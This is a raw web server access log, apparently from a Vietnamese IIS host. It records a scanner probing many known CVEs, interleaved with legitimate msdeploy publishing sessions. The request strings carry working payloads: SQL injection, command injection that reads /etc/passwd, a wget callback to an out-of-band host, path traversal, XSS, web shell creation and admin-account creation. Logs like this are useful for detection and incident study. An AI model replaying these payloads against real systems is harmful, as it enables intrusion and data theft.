Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 82 2023-08-02 02:58:31 103.153.214.94 GET /wp-admin/admin-ajax.php action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 80 2023-08-02 02:59:55 103.153.214.94 POST /http/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 79 2023-08-02 03:00:26 103.153.214.94 GET /secure/ContactAdministrators!default.jspa - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 84 2023-08-02 03:10:22 103.153.214.94 GET /RestAPI/ImportTechnicians - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 101 2023-08-02 03:11:28 103.153.214.94 GET / season=1&league_id=1season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&match_day=1&team_id=1&team_id=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 81 2023-08-02 03:16:06 103.153.214.94 POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 87 2023-08-02 03:20:36 103.153.214.94 GET /backupsettings.dat - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 81 2023-08-02 03:26:07 103.153.214.94 GET /clusterList - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 95 2023-08-02 03:33:41 103.153.214.94 GET /wp-admin/admin-ajax.php action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx) 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 85 2023-08-02 03:33:47 103.153.214.94 GET /widgets/knowledgebase topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 83 2023-08-02 03:40:14 103.153.214.94 GET /spip.php page=spip_pass 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 57 2023-08-02 03:49:30 103.153.214.94 POST /_ignition/execute-solution - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 58 2023-08-02 03:49:35 103.153.214.94 POST /human.aspx Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%272TO9hSbkgrSH3gryMtoGVweGIKg%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%272TO9hSbkgrSH3gryMtoGVweGIKg%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%272TO9hSbkgrSH3gryMtoGVweGIKg%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%272TO9hSbkgrSH3gryMtoGVweGIKg%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%272TO9hSbkgrSH3gryMtoGVweGIKg%27;UPDATE+activesessions+SET+IpAddress=%27111.90.143.37%27+WHERE+SessionID=%272TO9hSbkgrSH3gryMtoGVweGIKg%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%272TO9hSbkgrSH3gryMtoGVweGIKg%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%272TO9hSbkgrSH3gryMtoGVweGIKg%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%272TO9hSbkgrSH3gryMtoGVweGIKg%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%272TO9hSbkgrSH3gryMtoGVweGIKg%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%272TO9hSbkgrSH3gryMtoGVweGIKg%27%23 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 55 2023-08-02 03:49:39 103.153.214.94 POST /_ignition/execute-solution - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 68 2023-08-02 03:49:45 103.153.214.94 POST /_ignition/execute-solution - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 61 2023-08-02 03:49:52 103.153.214.94 POST /_ignition/execute-solution - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 53 2023-08-02 03:49:59 103.153.214.94 POST /_ignition/execute-solution - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 55 2023-08-02 03:50:06 103.153.214.94 POST /_ignition/execute-solution - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 79 2023-08-02 03:56:20 103.153.214.94 GET /fuel/pages/select/ filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 82 2023-08-02 04:08:16 103.153.214.94 GET /jsrpc.php type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 61 2023-08-02 04:09:43 103.153.214.94 POST /process/aprocess.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 92 2023-08-02 04:09:51 103.153.214.94 POST /apisix/batch-requests - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 80 2023-08-02 04:09:58 103.153.214.94 GET /api/2TO9hKNBjrTTAfuakCaR2unDMQo - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 116 2023-08-02 04:21:41 103.153.214.94 GET /free_time.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 59 2023-08-02 04:23:55 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 55 2023-08-02 04:24:01 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 72 2023-08-02 04:29:28 103.153.214.94 GET /wp-content/plugins/contact-form-7/readme.txt - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 124 2023-08-02 04:33:57 103.153.214.94 GET /premise/front/getPingData url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 63 2023-08-02 04:35:11 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 34 2023-08-02 04:35:11 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 71 2023-08-02 04:35:11 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 VSCmdLine:WTE6.0.6.36821;sid=b9bacd64-2c41-4549-b607-b0935fca132b;op=Sync - 200 0 0 253 2023-08-02 04:35:11 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 877 2023-08-02 04:35:12 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 25 2023-08-02 04:35:16 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 VSCmdLine:WTE6.0.6.36821;sid=b9bacd64-2c41-4549-b607-b0935fca132b;op=Sync - 200 0 0 4255 2023-08-02 04:35:16 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 4360 2023-08-02 04:42:31 103.153.214.94 GET /cgi-bin/mesh.cgi page=upgrade&key=;%27wget+http://cj4i6mq47492iin2kjb06amnwe3bcg9em.oast.pro;%27 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 75 2023-08-02 04:44:43 103.153.214.94 GET /admin/index.php p=ajax-ops&op=elfinder&cmd=mkfile&name=2TO9gyiQyM83sTkrgEcdpqJjXId.php&target=l1_Lw 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 59 2023-08-02 04:47:06 103.153.214.94 POST /texteditor.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 77 2023-08-02 04:49:43 103.153.214.94 POST /scgi-bin/platform.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 90 2023-08-02 04:49:49 103.153.214.94 POST /scgi-bin/platform.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 97 2023-08-02 04:55:26 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 100 2023-08-02 04:59:24 103.153.214.94 GET /webui/file_guest path=/var/www/documentation/../../../../../etc/passwd&flags=1152 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 86 2023-08-02 04:59:49 103.153.214.94 POST /api/timelion/run - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 79 2023-08-02 05:06:59 103.153.214.94 POST /run - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 67 2023-08-02 05:10:08 103.153.214.94 POST /upload - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 82 2023-08-02 05:12:30 103.153.214.94 POST /javax.faces.resource/dynamiccontent.properties.xhtml - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 342 2023-08-02 05:15:49 103.153.214.94 POST /wp-admin/admin.php page=html2wp-settings 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 68 2023-08-02 05:15:54 103.153.214.94 GET /wp-content/uploads/html2wp/2TO9hB0pPWGGIX6k30mpdNDghLA.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 111 2023-08-02 05:20:18 103.153.214.94 POST /wp-json/visualizer/v1/upload-data - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 59 2023-08-02 05:23:24 103.153.214.94 POST /ui/api/v1/ui/auth/login - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 104 2023-08-02 05:25:41 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 113 2023-08-02 05:32:25 103.153.214.94 GET /wp-admin/admin-ajax.php action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 83 2023-08-02 05:41:28 103.153.214.94 GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 87 2023-08-02 05:41:35 103.153.214.94 GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 336 2023-08-02 05:46:10 103.153.214.94 GET /manager/radius/server_ping.php ip=127.0.0.1|cat%20/etc/passwd>../../2TO9gl3wByqmJyBUm5Jt7Qm107U.txt&id=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 82 2023-08-02 05:46:17 103.153.214.94 GET /2TO9gl3wByqmJyBUm5Jt7Qm107U.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 87 2023-08-02 05:47:07 103.153.214.94 POST /actuator/gateway/routes/2TO9h3VKtahUZTSfNKR1i2sPAch - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 59 2023-08-02 05:47:13 103.153.214.94 POST /actuator/gateway/refresh - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 56 2023-08-02 05:47:18 103.153.214.94 DELETE /actuator/gateway/routes/2TO9h3VKtahUZTSfNKR1i2sPAch - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 72 2023-08-02 05:51:05 103.153.214.94 POST /api/login - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/manage/account/login?redirect=%2Fmanage 404 7 0 280 2023-08-02 06:00:48 103.153.214.94 POST /login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login.php 404 7 0 83 2023-08-02 06:02:39 103.153.214.94 GET /level/16/exec/show/config/CR - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 64 2023-08-02 06:05:53 103.153.214.94 GET /plus/ajax_common.php act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 84 2023-08-02 06:12:36 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 - 171.231.145.175 - - 401 2 5 23 2023-08-02 06:12:36 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 401 1 1326 70 2023-08-02 06:15:13 103.153.214.94 GET /Admin/Access/Setup/Default.aspx Action=createadministrator&adminusername=4RuACG&adminpassword=v5VJup&adminemail=test@test.com&adminname=test 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 85 2023-08-02 06:17:17 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 - 171.231.145.175 - - 401 2 5 28 2023-08-02 06:17:17 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 37 2023-08-02 06:17:17 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 42 2023-08-02 06:17:17 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 Unknown;sid=119e871a-06ac-4f1c-8d66-929542402de9;op=Sync - 200 0 0 158 2023-08-02 06:17:17 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 307 2023-08-02 06:17:27 103.153.214.94 GET /cgi-bin/downloadFlile.cgi payload=`ls>../2TO9h1Ea3NRZbIyX3AUwzV7esHB` 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 81 2023-08-02 06:17:29 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 26 2023-08-02 06:17:29 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 39 2023-08-02 06:17:29 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 VS17.0:PublishDialog:WTE17.4.326.54890;sid=e6959869-c436-42b8-a7de-807480389154;op=Sync - 200 0 0 302 2023-08-02 06:17:29 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 438 2023-08-02 06:17:29 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 27 2023-08-02 06:17:30 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 VS17.0:PublishDialog:WTE17.4.326.54890;sid=e6959869-c436-42b8-a7de-807480389154;op=Sync - 200 0 0 567 2023-08-02 06:17:30 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 690 2023-08-02 06:17:35 103.153.214.94 GET /2TO9h1Ea3NRZbIyX3AUwzV7esHB - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 56 2023-08-02 06:17:57 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 28 2023-08-02 06:17:57 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 26 2023-08-02 06:17:58 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 VS17.0:PublishDialog:WTE17.4.326.54890;sid=a958b171-0ff7-4049-b5f1-dd17718188d7;op=Sync - 200 0 0 1035 2023-08-02 06:17:58 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 1140 2023-08-02 06:17:58 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 29 2023-08-02 06:17:59 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 VS17.0:PublishDialog:WTE17.4.326.54890;sid=a958b171-0ff7-4049-b5f1-dd17718188d7;op=Sync - 200 0 0 1140 2023-08-02 06:17:59 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 1246 2023-08-02 06:18:51 103.153.214.94 GET /tests/support/stores/test_grid_filter.php query=echo%20md5%28%22CVE-2020-19625%22%29%3B 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 73 2023-08-02 06:18:52 103.153.214.94 GET /openstack/latest - 8172 - 111.90.143.37 - - 404 7 0 78 2023-08-02 06:18:59 103.153.214.94 GET /openstack/latest - 8172 - 111.90.143.37 - - 404 7 0 85 2023-08-02 06:21:05 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 36 2023-08-02 06:21:05 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 29 2023-08-02 06:21:05 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 611 2023-08-02 06:21:05 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 VSCmdLine:WTE6.0.6.36821;sid=615e427d-eba1-402a-9ea3-f4b00422ca7d;op=Sync - 200 0 0 135 2023-08-02 06:21:05 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 28 2023-08-02 06:21:07 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 VSCmdLine:WTE6.0.6.36821;sid=615e427d-eba1-402a-9ea3-f4b00422ca7d;op=Sync - 200 0 0 813 2023-08-02 06:21:07 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 933 2023-08-02 06:28:46 103.153.214.94 POST /logupload logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 60 2023-08-02 06:31:52 103.153.214.94 GET /wp-admin/admin-ajax.php action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 61 2023-08-02 06:36:34 103.153.214.94 POST /webapi/auth - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 75 2023-08-02 06:39:32 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn:8172/diagnostic.html?t=201701020919 404 7 0 67 2023-08-02 06:42:03 103.153.214.94 GET /ucmdb-api/connect - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 111 2023-08-02 06:42:45 103.153.214.94 POST /api/v1/login/oauth2/auth - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 104 2023-08-02 06:51:53 103.153.214.94 GET /downloader.php file=%3Becho+CVE-2023-23333|rev%00.zip 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 82 2023-08-02 06:53:47 103.153.214.94 POST /fileupload/toolsAny - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 81 2023-08-02 06:53:54 103.153.214.94 GET /authenticationendpoint/2to9hlynfds83fmywumyhnmokf8.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 56 2023-08-02 06:55:25 103.153.214.94 POST /login.php - 8172 - 111.90.143.37 